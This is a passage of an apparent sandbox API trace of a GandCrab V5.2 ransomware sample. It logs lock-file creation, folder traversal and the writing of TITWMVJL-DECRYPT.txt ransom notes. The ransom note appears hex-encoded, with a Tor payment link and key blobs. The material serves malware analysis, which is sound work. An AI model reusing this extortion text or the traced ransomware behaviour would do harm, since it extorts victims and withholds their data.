f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0091.198] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0091.198] CloseHandle (hObject=0x2ac) returned 1 [0091.199] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.199] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.199] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x24, wMilliseconds=0x1f9)) [0091.199] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.199] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.199] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.200] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\d2ca4a09d2ca4deb61a.lock") returned 68 [0091.200] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my pictures\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0091.200] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.200] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.200] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\") returned 44 [0091.201] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\*" [0091.201] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0xffffffff [0091.201] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\*", lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0xffffffff [0091.201] CloseHandle (hObject=0x2ac) returned 1 [0091.201] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.201] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0091.201] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0091.201] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="My Shapes" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes" [0091.201] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\" [0091.201] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0091.201] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.201] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.201] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.202] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.202] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.202] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.202] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.202] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.202] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.202] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.202] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\\\TITWMVJL-DECRYPT.txt") returned 63 [0091.202] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my shapes\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0091.204] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\